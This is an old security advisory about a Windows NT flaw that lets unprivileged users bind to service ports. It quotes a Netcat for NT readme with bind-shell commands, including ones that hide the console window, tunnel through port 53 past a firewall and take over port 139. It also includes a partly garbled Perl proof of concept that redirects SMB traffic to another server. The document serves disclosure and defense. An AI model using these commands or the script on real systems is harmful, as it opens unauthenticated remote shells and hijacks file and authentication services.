Port binding


    Win NT


    Following  is  based  on  Weld  Pond's  finding described in L0pht
    Advisory.  NT allows any logged on  user to bind to any port.   It
    also allows users to  bind to the ports  used by services such  as
    NETBIOS.  By specifying a source  IP to bind to, the user  program
    takes precedence over the NT services listening on the port.  This
    allows  user  programs  to  listen  for  connections even when the
    machine  is  filtering  incoming  ports  using the TCP/IP Security
    Network filters, if  the machine is  running any TCP/IP  services.
    This  also  allows  a  user  program  to disrupt services that are
    running on the machine such  as file sharing that otherwise  would
    require administrator privileges to terminate.

    Netcat for NT allows  a user to set  up connections such as  this.
    The zip file for the executable and source code is located at:

    Below is the part of readme.txt file for Netcat 1.10 for NT  which
    describes this in detail plus other interesting things the program
    can do.

    Basic Features:

        * Outbound or inbound connections, TCP or UDP, to or from  any
        * Full DNS forward/reverse checking, with appropriate warnings
        * Ability to use any local source port
        * Ability to use any locally-configured network source address
        * Built-in port-scanning capabilities, with randomizer
        * Can read command line arguments from standard input
        * Slow-send mode, one line every N seconds
        * Hex dump of transmitted and received data
        * Ability   to  let   another  program   service   established
        * Telnet-options responder

    New for NT:

        * Ability to run in the background without a console window
        * Ability to restart as  a single-threaded server to handle  a
          new connection

    A simple example of using Netcat is to pull down a web page from a
    web server.  With  Netcat you get to  see the full HTTP  header so
    you can see which web server a particular site is running.   Since
    NT has a rather anemic command processor, some of the things  that
    are easy in unix may be a bit more clunky in NT.  For the web page
    example first create  a file get.txt  that contains the  following
    line and then a blank line:

        GET / HTTP/1.0

    To use  Netcat to  retrieve the  home page  of a  web site use the

        nc -v 80 < get.txt

    You will see Netcat  make a connection to  port 80, send the  text
    contained in the  file get.txt, and  then output the  web server's
    response to stdout.  The -v is for verbose.  It tells you a little
    info about the connection when it  starts.  It is a bit  easier to
    just open the connection  and then type at  the console to do  the
    same thing.

        nc -v 80

    Then just type in GET / HTTP/1.0 and hit a couple of returns.  You
    will see the same thing as above.

    A far more exciting thing to do is to get a quick shell going on a
    remote machine by using  the -l or "listen"  option and the -e  or
    "execute" option.   You run  Netcat listening  on particular  port
    for a connection.  When a connection is made, Netcat executes  the
    program of your  choice and connects  the stdin and  stdout of the
    program to the network connection:

        nc -l -p 23 -t -e cmd.exe

    will  get  Netcat  listening  on  port  23 (telnet).  When it gets
    connected to by a client it will spawn a shell (cmd.exe).  The  -t
    option tells Netcat  to handle any  telnet negotiation the  client
    might expect.  This  will allow you to  telnet to the machine  you
    have Netcat listening on and get a cmd.exe shell when you connect.
    You could just as well use Netcat instead of telnet:

        nc 23

    will get the job done. There is no authentication on the listening
    side so  be a  bit careful  here.   The shell  is running with the
    permissions of the process that started Netcat so be very careful.
    If  you  were  to  use  the  AT  program to schedule Netcat to run
    listening on a port with the -e cmd.exe option, when you connected
    you would get a shell with user NT AUTHORITY\SYSTEM.

    The beauty of Netcat really  shines when you realize that  you can
    get it listening on  ANY port doing the  same thing.  Do  a little
    exploring and see if the firewall  you may be behind lets port  53
    through.  Run Netcat listening behind the firewall on port 53:

        nc -L -p 53 -e cmd.exe

    Then from outside the firewall connect to the listening machine:

        nc -v 53

    If you get a command prompt then you are executing commands on the
    listening machine.  Use 'exit'  at the command prompt for  a clean
    disconnect. The -L (note the capital L) option will restart Netcat
    with the same command line when the connection is terminated. This
    way you can connect over and  over to the same Netcat process.   A
    new feature for the  NT version is the  -d or detach from  console
    flag.   This will  let Netcat  run without  an ugly console window
    cluttering up the screen or showing up in the task list.  You  can
    even get Netcat to listen  on the NETBIOS ports that  are probably
    running on most NT machines.  This way you can get a connection to
    a  machine  that  may  have  port  filtering enabled in the TCP/IP
    Security Network control panel.  Unlike Unix, NT does not seem  to
    have  any  security  around  which  ports  that  user programs are
    allowed to bind to.   This means any user  can run a program  that
    will bind to the NETBIOS ports.   You will need to bind "in  front
    of" some services  that may already  be listening on  those ports.
    An example is the NETBIOS Session Service that is running on  port
    139 of NT machines that are sharing files.  You need to bind to  a
    specific source address (one of  the IP addresses of the  machine)
    to accomplish this.  This  gives Netcat priority over the  NETBIOS
    service which is at  a lower priority because  it is bound to  ANY
    IP address.  This is done with the Netcat -s option:

        nc -v -L -e cmd.exe -p 139 -s

    Now you can  connect to the  machine on port  139 and Netcat  will
    field the connection  before NETBIOS does.   You have  effectively
    shut off file sharing on this  machine by the way.  You  have done
    this with just user privileges to boot.

    Following  program  uses  the  NT  port  binding  vulnerability to
    redirect a  machine's SMB  services to  another machine.   It  was
    posted  by  Andrew  Tridgell  on  the  Common Internet File System
    mailing list.   It has some  interesting consequences for  a Hydra
    server.   The  full  message  and  the  thread  surrounding  it is
    available via the web at:

    Script follows:

    # This script demonstrates  a major security problem  with Windows
    # NT4.  It  is  based   on  an  earlier  script  (    that
    # demonstrated  a problem  with a  protocol change  that Microsoft
    # proposed.   The  change  in  this  script  takes advantage of  a
    # security hole pointed out by L0pht (

    # What this  script does is  allow any unprivileged  user on a  NT
    # Server  to  redirect  the  local  SMB services to any other  SMB
    # server which they have an  IP address for. This allows the  user
    # to redirect file, printer and authentication services to another
    # server. This has enormous consequences for security.

    # This script was written by Andrew Tridgell and is being sent  to
    # the CIFS  discussion list so  that CIFS developers  become aware
    # of this problem. It should be noted that the L0pht  announcement
    # (which predates this script) already provided an example command
    # using netcat to achieve the  same thing so this script does  not
    # actually  offer malicious  hackers anything  more than  what has
    # already been  widely distributed. I  wrote this example  so that
    # the consequences would become clear  to the people who are in  a
    # position to do something about fixing the problem.

    # USAGE:
    # To use this script install perl5 then run the command
    #        perl <localip> <remoteip>
    # for example
    #        perl
    # this would redirect any SMB connections made to the local server
    # (whose  IP  address  is  to  the  remote   server
    # Any browsing, file access, authentication requests
    # or  printing done  to the  local server  by SMB  clients will be
    # redirected to the remote server.

    use IO::Socket;
    use IO::Select;

    if ($#ARGV != 1) {
        print "Usage: <localip> <remoteip>\n";
        exit 0;

    my $local = $ARGV[0];
    my $target = $ARGV[1];

    my $smbport = "139";
    my $Msg;

    # this is a *SMBSERVER netbios name

    print "setting up redirection from $local to $target ...\n";

    # Create a local socket
    $sock1 = new IO::Socket::INET(LocalAddr=>$local,LocalPort=>$smbport,

    while (1) {

    print "listening on $local\n";

    # Accept a connection
    $IS = $sock1->accept() || die;

    # Open a socket to the remote host
    $OS = new
    IO::Socket::INET(PeerAddr=>$target,PeerPort=>$smbport,Proto=>'tcp') ||

    print "connected to $target\n";

    # Create a read set for select()
    $rs = new IO::Select();

    $first = 1;
    $finished = 0;

    while(! $finished) {
        ($r_ready) = IO::Select->select($rs,undef,undef,undef);

        foreach $i (@$r_ready) {
            $o = $OS if $i == $IS;
            $o = $IS if $i == $OS;

            if (! length $Msg) {
                $finished = 1;

            if ($first && substr($Msg,0,1) eq "\x81") {
                print "replacing called name\n";
                $msg2 =
                $first = 0;
            } else {
                if ($i == $OS) { $Msg =~ s/Paul/Oops/mg;}

    # loop back to the top again


    There is no immediate fix to this security problem yet  available.
    A workaround for given example  (perl script) is to disable  local
    login access to non-trusted users.  This can be achieved using the
    "User  Manager  For  Domains".  At  many  sites  this  will  be an
    acceptable solution  because NT  servers are  often used  only for
    remote file and printer services  and do not really need  to offer
    the ability  for users  to run  arbitrary programs.   A proper fix
    will require a  patch from Microsoft.  Hopefully they will  either
    implement privileged  ports or  they will  get the  socket options
    correct  on  all  their  servers  so  such  bind()  tricks are not